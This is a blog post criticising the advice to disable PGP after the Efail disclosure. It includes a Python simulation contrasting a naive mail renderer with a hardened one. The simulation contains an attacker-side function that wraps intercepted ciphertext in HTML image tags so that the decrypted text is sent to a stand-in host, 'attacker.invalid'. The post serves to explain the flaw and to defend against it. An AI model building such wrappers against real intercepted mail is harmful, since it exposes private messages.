Another security nightmare started to unfold today as a Gizmodo article suggested that “if you use PGP or S/MIME for email encryption you should immediately disable it in your email client.” Why such a dire command? A vulnerability called “Efail”, disclosed this morning by a group of academic researchers in Europe, which can expose the plaintext of encrypted emails. Gizmodo’s advice was basically just repeating the EFF, which relayed the researchers’ recommendation early this morning: “Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.” This panic in the cyber security space is something we have now become all too used to.
Security researchers are advising people to stop using PGP, and the media is following suit. But this is a terrible idea. Even if a malicious actor could exploit this vulnerability (which is harder than the headlines suggest: the attacker must already hold a copy of the ciphertext, and the victim’s client must decrypt it automatically and then load remote content), encryption is better than no encryption. This is like saying “your lock may not work, so leave your door wide open.”
The headlines reported this as a bug in PGP, but for the most part it is not a PGP issue. The direct exfiltration variant is an issue with the way clients render mail: an attacker who has intercepted an encrypted message wraps it in a new multipart message whose HTML parts open an image tag before the encrypted part and close it after it, so a client that decrypts automatically and concatenates the parts into one HTML document sends the decrypted text to the attacker’s server as part of the image URL. That is a client-side content rendering problem, not a break of the cryptography. One caveat is warranted: the paper’s second variant, the CBC/CFB gadget attack, does exploit malleability of the encrypted formats (S/MIME’s CBC mode carries no integrity protection, and OpenPGP’s MDC only helps if the client refuses to display plaintext when the check fails), but even that variant still needs the same exfiltration channel, a renderer that fetches remote content, to leak anything. Savvy users of email clients would already have disabled HTML rendering and remote content loading for decrypted email; disabling scripts alone is not enough, because the leak rides on an image load, not on JavaScript.
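To make the rendering point concrete, here is an added simulation of the direct exfiltration channel beside the client-side fix. It is not the researchers’ code and not any real mail client’s code: decryption is a stand-in (a lookup keyed by a constructed ciphertext blob, so no key or GnuPG is needed), the encrypted part is carried as application/octet-stream rather than multipart/encrypted, and the attacker host and addresses are made up. The “naive” renderer splices every decoded part into one HTML document; the “isolated” renderer gives each part its own document, escapes decrypted text, and drops remote resources.

```python
"""Added illustration of the Efail direct-exfiltration channel and the
client-side fix.  Not the researchers' code and not any mail client's code.
Decryption is a stand-in: a lookup table keyed by a constructed ciphertext
blob, so nothing here needs GnuPG or a key."""
import email
import html
import re
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Constructed: one "ciphertext" the victim can decrypt, and its plaintext.
PLAINTEXT = "Secret: the meeting moved to 3pm"
CIPHERTEXT = b"-----BEGIN PGP MESSAGE-----\nQ0lQSEVSVEVYVA==\n-----END PGP MESSAGE-----"
FAKE_KEYRING = {CIPHERTEXT: PLAINTEXT}

# Stand-in for the part type a client hands to its crypto engine; a real
# message would use multipart/encrypted with application/pgp-encrypted.
ENCRYPTED_CTYPE = "application/octet-stream"


def fake_decrypt(payload: bytes) -> str:
    """Stand-in for the victim's PGP/S-MIME engine: ciphertext -> plaintext."""
    return FAKE_KEYRING.get(payload.strip(), "")


def build_direct_exfil_message(ciphertext: bytes, attacker_host: str) -> bytes:
    """Attacker-side wrapper.  The attacker needs no key: an intercepted
    encrypted part is placed between two HTML fragments that open, and later
    close, an <img src="..."> attribute."""
    msg = MIMEMultipart("mixed")
    msg["From"] = "attacker@example.invalid"   # constructed addresses
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Re: earlier mail"
    msg.attach(MIMEText('<img src="http://%s/' % attacker_host, "html"))
    msg.attach(MIMEApplication(ciphertext, "octet-stream"))
    msg.attach(MIMEText('">', "html"))
    return msg.as_bytes()


def _leaf_parts(raw: bytes):
    msg = email.message_from_bytes(raw)
    return [p for p in msg.walk() if not p.is_multipart()]


def render_naive(raw: bytes, decrypt=fake_decrypt) -> str:
    """Vulnerable client behaviour: decrypt every encrypted part and splice
    all parts into ONE HTML document.  The attribute opened in part 1 now
    swallows the plaintext of part 2 and is closed by part 3."""
    out = []
    for part in _leaf_parts(raw):
        ctype = part.get_content_type()
        if ctype == "text/html":
            out.append(part.get_payload(decode=True).decode())
        elif ctype == ENCRYPTED_CTYPE:
            out.append(decrypt(part.get_payload(decode=True)))
    return "".join(out)


def strip_remote(fragment: str) -> str:
    """Block remote content: empty any src= that points at http(s), even an
    unterminated one such as <img src="http://host/ with no closing quote."""
    return re.sub(r'(src=")https?://[^"]*', r"\1", fragment, flags=re.I)


def render_isolated(raw: bytes, decrypt=fake_decrypt, allow_remote=False) -> list:
    """Hardened client behaviour: each MIME part becomes its own document
    (think one sandboxed iframe per part), decrypted text is HTML-escaped and
    never spliced into another part's markup, and remote resources are
    dropped unless the user explicitly allows them."""
    docs = []
    for part in _leaf_parts(raw):
        ctype = part.get_content_type()
        if ctype == "text/html":
            body = part.get_payload(decode=True).decode()
            docs.append(body if allow_remote else strip_remote(body))
        elif ctype == ENCRYPTED_CTYPE:
            docs.append("<pre>%s</pre>" % html.escape(decrypt(part.get_payload(decode=True))))
    return docs


IMG_SRC = re.compile(r'<img\s[^>]*?src="([^"]*)"', re.I)


def fetched_urls(document: str) -> list:
    """URLs an image-loading renderer would request for this document."""
    return [u for u in IMG_SRC.findall(document)
            if u.lower().startswith(("http://", "https://"))]


def leaks(document: str, secret: str) -> bool:
    """True if any remote fetch would carry the secret to the attacker."""
    return any(secret in u for u in fetched_urls(document))


if __name__ == "__main__":
    raw = build_direct_exfil_message(CIPHERTEXT, "attacker.invalid")
    print("naive client leaks plaintext:", leaks(render_naive(raw), PLAINTEXT))
    print("isolated client leaks plaintext:",
          any(leaks(d, PLAINTEXT) for d in render_isolated(raw)))
```

The naive renderer ends up fetching http://attacker.invalid/Secret: the meeting moved to 3pm, which is the whole leak. The isolated renderer never lets an attribute opened in one part close in another, so even with remote content allowed there is no URL to fetch, and with remote content blocked (the default here, and the setting the post recommends) the attacker’s host is never contacted at all.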
ProtonMail tweeted this today: “Efail is a prime example of irresponsible disclosure. There is no responsibility in hyping the story to @EFF and mainstream media and getting an irresponsible recommendation published (disable PGP), ignoring the fact that many (Enigmail, etc) are already patched.”
We all face enough legitimate cyber security issues without adding more noise here. We can’t go around encouraging consumers to turn off encryption in their email. That is asking for something worse than any 0day: mail that needs no exploit at all to read. Be careful what you believe, folks.